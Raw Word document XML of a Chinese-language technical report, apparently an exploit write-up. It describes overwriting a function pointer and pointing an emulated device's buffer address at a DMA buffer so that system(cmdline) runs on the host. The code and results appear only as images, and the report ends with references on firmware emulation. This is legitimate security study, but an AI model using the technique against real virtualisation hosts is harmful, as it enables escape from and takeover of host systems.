        </w:rPr>
        <w:t>将exp中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，然后再用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作为system调用时的参数。写入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的代码如下，注意到由于对齐的要求，首先我们把</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>粘到了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A50CE7E" w14:textId="6C125672" w:rsidR="00731A98" w:rsidRDefault="00731A98" w:rsidP="00731A98">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BEC8265" wp14:editId="274983C3">
            <wp:extent cx="5274310" cy="661670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="4019825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982514" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="661670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="220F95DB" w14:textId="77777777" w:rsidR="00731A98" w:rsidRPr="00F27977" w:rsidRDefault="00731A98" w:rsidP="00731A98">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C49F923" w14:textId="704B1638" w:rsidR="00731A98" w:rsidRPr="00731A98" w:rsidRDefault="00731A98" w:rsidP="00731A98">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>覆盖函数指针p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE76432" w14:textId="5EEE78F8" w:rsidR="00731A98" w:rsidRDefault="00731A98" w:rsidP="00731A98">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用之前</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>泄露p时候的类似流程可以覆盖p，只需要反转数据流向即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A528DC0" w14:textId="7390F2E4" w:rsidR="00731A98" w:rsidRDefault="00731A98" w:rsidP="00731A98">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42E490BA" wp14:editId="30F4C86B">
            <wp:extent cx="5274310" cy="719455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="17546568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656845" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="719455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA9587" w14:textId="77777777" w:rsidR="00731A98" w:rsidRPr="00731A98" w:rsidRDefault="00731A98" w:rsidP="00731A98">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>覆盖函数指针p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36173B14" w14:textId="66D0469E" w:rsidR="00A73887" w:rsidRDefault="00A73887" w:rsidP="00A73887">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后，把opaque-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，并触发任意的读写操作，即可调用system(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)。唯一需要注意的是由于0x1000的对齐要求，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也需要调整到整页上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204E3523" w14:textId="6A524358" w:rsidR="00A73887" w:rsidRDefault="00A73887" w:rsidP="00A73887">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70EE7915" wp14:editId="07A80CF9">
            <wp:extent cx="4846740" cy="609653"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19344164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416420" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4846740" cy="609653"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA7E74" w14:textId="77777777" w:rsidR="00A73887" w:rsidRDefault="00A73887" w:rsidP="00A73887">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4862122A" w14:textId="076388FE" w:rsidR="00A73887" w:rsidRDefault="00A73887" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>执行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA0022" w14:textId="6B0A763C" w:rsidR="00A73887" w:rsidRDefault="00A73887" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AB8CF6B" wp14:editId="25A5F73C">
            <wp:extent cx="4035425" cy="2849245"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:docPr id="109031876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35425" cy="2849245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC0CFB" w14:textId="77777777" w:rsidR="00A73887" w:rsidRDefault="00A73887" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF2EF6C" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FCA5421" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1CFF45" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A754993" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E3C188" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1306A866" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BE8701" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27105002" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="477520FB" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C69C0F2" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1C1890" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6908EAD9" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD2648E" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22287FDE" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462EEBC8" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A60409" w14:textId="77777777" w:rsidR="00AA33B8" w:rsidRPr="00731A98" w:rsidRDefault="00AA33B8" w:rsidP="00A73887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF37B6C" w14:textId="7016A556" w:rsidR="006C0701" w:rsidRPr="00CA1641" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA1641">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>参考文献</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D2B4B4" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Ref169809838"/>
      <w:r w:rsidRPr="004B462E">
        <w:t xml:space="preserve">Kim M, Kim D, Kim E, et al. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B462E">
        <w:t>Firmae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B462E">
        <w:t xml:space="preserve">: Towards large-scale emulation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B462E">
        <w:t>iot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B462E">
        <w:t xml:space="preserve"> firmware for dynamic analysis[C]//Proceedings of the 36th Annual Computer Security Applications Conference. 2020: 733-745.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="4C6B2865" w14:textId="77777777" w:rsidR="006C0701" w:rsidRPr="00824E01" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Ref169812660"/>
      <w:r w:rsidRPr="003937BA">
        <w:t xml:space="preserve">Chen D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003937BA">
        <w:t>D</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003937BA">
        <w:t xml:space="preserve">, Woo M, Brumley D, et al. Towards automated dynamic analysis for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003937BA">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003937BA">
        <w:t>-based embedded firmware[C]//NDSS. 2016, 1: 1-1.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="45F97DB6" w14:textId="77777777" w:rsidR="006C0701" w:rsidRPr="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F5892DA" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54065F9B" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD5F2A4" w14:textId="77777777" w:rsidR="00A73887" w:rsidRPr="006C0701" w:rsidRDefault="00A73887" w:rsidP="00A73887">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A73887" w:rsidRPr="006C070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E71A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46BE6272"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="860" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF">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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0EBE4C08"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C64F438"/>
    <w:lvl w:ilvl="0" w:tplc="23084E8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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F403852"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D65AB1A6"/>
    <w:lvl w:ilvl="0" w:tplc="6C8228BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="780" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>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0FF02B76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBC2E55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8D6751E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C518A6BE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>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1A1E1F0B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F45C3662"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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1D503A9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="452AAE16"/>
    <w:lvl w:ilvl="0" w:tplc="94ECC894">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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1DE93895"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F7342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F04C48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46BE6272"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="860" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090019">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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2D735E6A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F45C3662"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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2DE84B38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3BCFFAC"/>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30821ED7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90022068"/>
    <w:lvl w:ilvl="0" w:tplc="D7126BB8">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3089297E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3796E59A"/>
    <w:lvl w:ilvl="0" w:tplc="E5D82AD8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="440" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2)"/>
